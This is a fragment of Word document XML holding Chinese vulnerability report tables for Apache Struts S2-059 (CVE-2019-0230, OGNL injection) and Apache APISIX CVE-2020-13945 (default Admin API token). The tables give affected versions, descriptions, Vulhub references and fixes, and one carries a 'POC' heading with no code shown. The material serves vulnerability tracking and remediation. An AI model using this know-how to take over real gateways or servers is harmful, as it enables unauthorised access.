            <w:r w:rsidRPr="00B7287A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>年</w:t>
            </w:r>
            <w:r w:rsidRPr="00B7287A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="00B7287A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>月</w:t>
            </w:r>
            <w:r w:rsidRPr="00B7287A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidRPr="00B7287A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日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D834B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79F0" w14:textId="6808ECE1" w:rsidR="00AC3E9B" w:rsidRDefault="003F570E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F570E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>West Shepherd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CADAE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AD3F" w14:textId="77777777" w:rsidR="00AC3E9B" w:rsidRDefault="00AC3E9B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AC3E9B" w14:paraId="206A02E4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0E6BC45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8EBD" w14:textId="102B2E1C" w:rsidR="00AC3E9B" w:rsidRDefault="000E0917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高危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5DC340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38E1" w14:textId="43EFC9A1" w:rsidR="00AC3E9B" w:rsidRDefault="003F570E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F570E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>West Shepherd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4AE648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2A21" w14:textId="4A26D126" w:rsidR="00AC3E9B" w:rsidRDefault="003F570E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 w:hint="eastAsia"/>
              </w:rPr>
              <w:t>tructs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="47436323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DFDA292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884B" w14:textId="324B84BA" w:rsidR="00AC3E9B" w:rsidRDefault="003F570E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F570E">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Apache Struts 2.0.0 - 2.5.20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="6EB90B65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F3F10E6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49EE" w14:textId="5AE86D9E" w:rsidR="00AC3E9B" w:rsidRDefault="00000000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hyperlink r:id="rId16" w:history="1">
              <w:r w:rsidR="003F570E" w:rsidRPr="003F570E">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t>CVE - CVE-2020-8840 (mitre.org)</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="31E41786" w14:textId="77777777" w:rsidTr="00AC3E9B">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="113" w:type="dxa"/>
          <w:trHeight w:val="412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BF71D06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486B" w14:textId="4B343870" w:rsidR="00AC3E9B" w:rsidRDefault="00E333CF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E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Apache Struts2</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>框架是一个用于开发</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Java EE</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络应用程序的</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Web</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>框架。</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Apache Struts</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>于</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>2020</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>年</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>月</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>日披露</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> S2-059 Struts </w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>远程代码执行漏洞（</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>CVE-2019-0230</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）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AC3E9B" w14:paraId="07FB33D5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66743AD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C0F14" w14:textId="0D8DBB26" w:rsidR="00AC3E9B" w:rsidRDefault="00E333CF" w:rsidP="00084E4A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r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在使用某些</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>tag</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>等情况下可能存在</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>OGNL</w:t>
            </w:r>
            <w:r w:rsidRPr="00E333CF">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>表达式注入漏洞，从而造成远程代码执行，风险极大。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="23364E6F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B002362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387F" w14:textId="4623D1CA" w:rsidR="00AC3E9B" w:rsidRDefault="00000000" w:rsidP="00084E4A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hyperlink r:id="rId17" w:history="1">
              <w:r w:rsidR="003741A0" w:rsidRPr="003741A0">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t>【漏洞预警】</w:t>
              </w:r>
              <w:r w:rsidR="003741A0" w:rsidRPr="003741A0">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t>Apache Struts</w:t>
              </w:r>
              <w:r w:rsidR="003741A0" w:rsidRPr="003741A0">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t>远程代码执行漏洞（</w:t>
              </w:r>
              <w:r w:rsidR="003741A0" w:rsidRPr="003741A0">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t>S2-059</w:t>
              </w:r>
              <w:r w:rsidR="003741A0" w:rsidRPr="003741A0">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t>、</w:t>
              </w:r>
              <w:r w:rsidR="003741A0" w:rsidRPr="003741A0">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t>CVE-2019-0230</w:t>
              </w:r>
              <w:r w:rsidR="003741A0" w:rsidRPr="003741A0">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t>）</w:t>
              </w:r>
              <w:r w:rsidR="003741A0" w:rsidRPr="003741A0">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t xml:space="preserve"> (qq.com)</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="68F734FC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56BBA2F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9050" w14:textId="7958222C" w:rsidR="00AC3E9B" w:rsidRDefault="003741A0" w:rsidP="00084E4A">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>V</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ulhub</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="49D55C4E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EB8A546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66B1" w14:textId="79CE6983" w:rsidR="00AC3E9B" w:rsidRDefault="003741A0" w:rsidP="00084E4A"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 w:rsidR="00AC3E9B" w14:paraId="6C1DF20B" w14:textId="77777777" w:rsidTr="00AC3E9B">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter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9430B88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292A" w14:textId="76F5DC39" w:rsidR="00AC3E9B" w:rsidRDefault="003741A0" w:rsidP="00084E4A">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将</w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Apache Struts</w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>框架升级至最新版本。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="2D8D1F12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6FC8435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A731" w14:textId="49769A83" w:rsidR="00AC3E9B" w:rsidRDefault="003741A0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741A0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>CVE-2020-13945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E2D6A6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5B98" w14:textId="77777777" w:rsidR="00AC3E9B" w:rsidRDefault="00AC3E9B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C662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9A95" w14:textId="41DE7305" w:rsidR="00AC3E9B" w:rsidRDefault="003741A0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741A0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>CVE-2020-13945</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="52A539BF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9EDC052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C7E7" w14:textId="580E4558" w:rsidR="00AC3E9B" w:rsidRPr="003741A0" w:rsidRDefault="003741A0" w:rsidP="003741A0">
            <w:pPr>
              <w:pStyle w:val="A7"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003741A0">
              <w:t>2020-12-8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BCD903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17BE" w14:textId="77777777" w:rsidR="00AC3E9B" w:rsidRDefault="00AC3E9B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18AB8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A59C" w14:textId="77777777" w:rsidR="00AC3E9B" w:rsidRDefault="00AC3E9B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AC3E9B" w14:paraId="7A55CD4D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7A539B1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提交时间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04F6" w14:textId="32C559AE" w:rsidR="00AC3E9B" w:rsidRDefault="003741A0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741A0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>2020-12-8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1F3AF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1C1" w14:textId="63021C28" w:rsidR="00AC3E9B" w:rsidRDefault="001D24A5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1D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Heyder Andrade, YuanSheng Wang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91995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3555" w14:textId="77777777" w:rsidR="00AC3E9B" w:rsidRDefault="00AC3E9B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AC3E9B" w14:paraId="3051F043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8B1F17E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459D" w14:textId="77777777" w:rsidR="00AC3E9B" w:rsidRDefault="00AC3E9B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D85E1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EDAA" w14:textId="4052E0CE" w:rsidR="00AC3E9B" w:rsidRDefault="001D24A5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1D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Heyder Andrade, YuanSheng Wang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B8660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CED8" w14:textId="7B4406F7" w:rsidR="00AC3E9B" w:rsidRDefault="003741A0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3741A0">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Apache APISIX</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="378899D6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27B123B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A7F4" w14:textId="5551F8F4" w:rsidR="001D24A5" w:rsidRPr="001D24A5" w:rsidRDefault="001D24A5" w:rsidP="001D24A5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1D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Apache APISIX 1.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D08A01E" w14:textId="4A2A56D5" w:rsidR="001D24A5" w:rsidRPr="001D24A5" w:rsidRDefault="001D24A5" w:rsidP="001D24A5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1D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Apache APISIX 1.3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F9C431D" w14:textId="44C87EBC" w:rsidR="001D24A5" w:rsidRPr="001D24A5" w:rsidRDefault="001D24A5" w:rsidP="001D24A5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1D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Apache APISIX 1.4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56773DBF" w14:textId="5AB2C0D2" w:rsidR="00AC3E9B" w:rsidRDefault="001D24A5" w:rsidP="001D24A5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1D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
              <w:t>Apache APISIX 1.5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="2700A006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E826B3B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6AA9" w14:textId="04140ACC" w:rsidR="00AC3E9B" w:rsidRDefault="00000000" w:rsidP="00084E4A">
            <w:pPr>
              <w:pStyle w:val="A7"/>
              <w:spacing w:line="480" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId18" w:history="1">
              <w:r w:rsidR="001D24A5" w:rsidRPr="001D24A5">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t>NVD - CVE-2020-13945 (nist.gov)</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="4307EE9C" w14:textId="77777777" w:rsidTr="00AC3E9B">
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:wBefore w:w="113" w:type="dxa"/>
          <w:trHeight w:val="412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E07DCB8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772D" w14:textId="2A2FE5F8" w:rsidR="00AC3E9B" w:rsidRPr="001D24A5" w:rsidRDefault="001D24A5" w:rsidP="001D24A5">
            <w:pPr>
              <w:rPr>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Apache APISIX </w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>是一个动态、实时、高性能的</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> API </w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>网关，基于</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Nginx </w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>网络库和</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> etcd </w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>实现，</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:kern w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="3842EFA4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2259BADA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116A" w14:textId="7500E6BE" w:rsidR="00AC3E9B" w:rsidRDefault="001D24A5" w:rsidP="00084E4A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r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>当使用者开启了</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Admin API</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，没有配置相应的</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>访问策略，且没有修改配置文件</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Token</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的情况下，则攻击者利用</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Apache APISIX</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的默认</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Token</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>即可访问</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Apache APISIX</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，从而控制</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>APISIX</w:t>
            </w:r>
            <w:r w:rsidRPr="001D24A5">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网关。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="4B2EA372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7AF04223" w14:textId="77777777" w:rsidR="00AC3E9B" w:rsidRDefault="00AC3E9B" w:rsidP="00AC3E9B">
            <w:pPr>
              <w:pStyle w:val="A7"/>
              <w:spacing w:line="480" w:lineRule="auto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3791" w14:textId="4D9C5D7C" w:rsidR="00AC3E9B" w:rsidRDefault="00000000" w:rsidP="00084E4A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hyperlink r:id="rId19" w:history="1">
              <w:r w:rsidR="001D24A5" w:rsidRPr="001D24A5">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t>【漏洞预警】</w:t>
              </w:r>
              <w:r w:rsidR="001D24A5" w:rsidRPr="001D24A5">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t xml:space="preserve">Apache APISIX Admin API </w:t>
              </w:r>
              <w:r w:rsidR="001D24A5" w:rsidRPr="001D24A5">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t>默认</w:t>
              </w:r>
              <w:r w:rsidR="001D24A5" w:rsidRPr="001D24A5">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t>Token</w:t>
              </w:r>
              <w:r w:rsidR="001D24A5" w:rsidRPr="001D24A5">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t>漏洞（</w:t>
              </w:r>
              <w:r w:rsidR="001D24A5" w:rsidRPr="001D24A5">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t>CVE-2020-13945</w:t>
              </w:r>
              <w:r w:rsidR="001D24A5" w:rsidRPr="001D24A5">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t>）</w:t>
              </w:r>
              <w:r w:rsidR="001D24A5" w:rsidRPr="001D24A5">
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                </w:rPr>
                <w:t xml:space="preserve"> (qq.com)</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="0392E902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7412A4C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964C" w14:textId="38BAE48A" w:rsidR="00AC3E9B" w:rsidRDefault="00DD3D7D" w:rsidP="00084E4A">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>V</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>ulhub</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AC3E9B" w14:paraId="31CAA205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601ADE5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lastRenderedPageBreak/>
              <w:t>POC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FE8F" w14:textId="686089AF" w:rsidR="00AC3E9B" w:rsidRDefault="007B280E" w:rsidP="00084E4A"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 w:rsidR="00AC3E9B" w14:paraId="4C28D12F" w14:textId="77777777" w:rsidTr="00AC3E9B">
        <w:trPr>
          <w:gridBefore w:val="1"/>
          <w:wBefore w:w="113" w:type="dxa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5B66D36" w14:textId="77777777" w:rsidR="00AC3E9B" w:rsidRDefault="00AC3E9B" w:rsidP="00084E4A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EF44" w14:textId="77777777" w:rsidR="003741A0" w:rsidRPr="003741A0" w:rsidRDefault="003741A0" w:rsidP="003741A0">
            <w:pPr>
              <w:spacing w:line="480" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve">1. </w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>修改</w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Apache APISIX</w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>配置文件中</w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> conf/config.yaml </w:t>
            </w:r>
            <w:r w:rsidRPr="003741A0">
              <w:rPr>
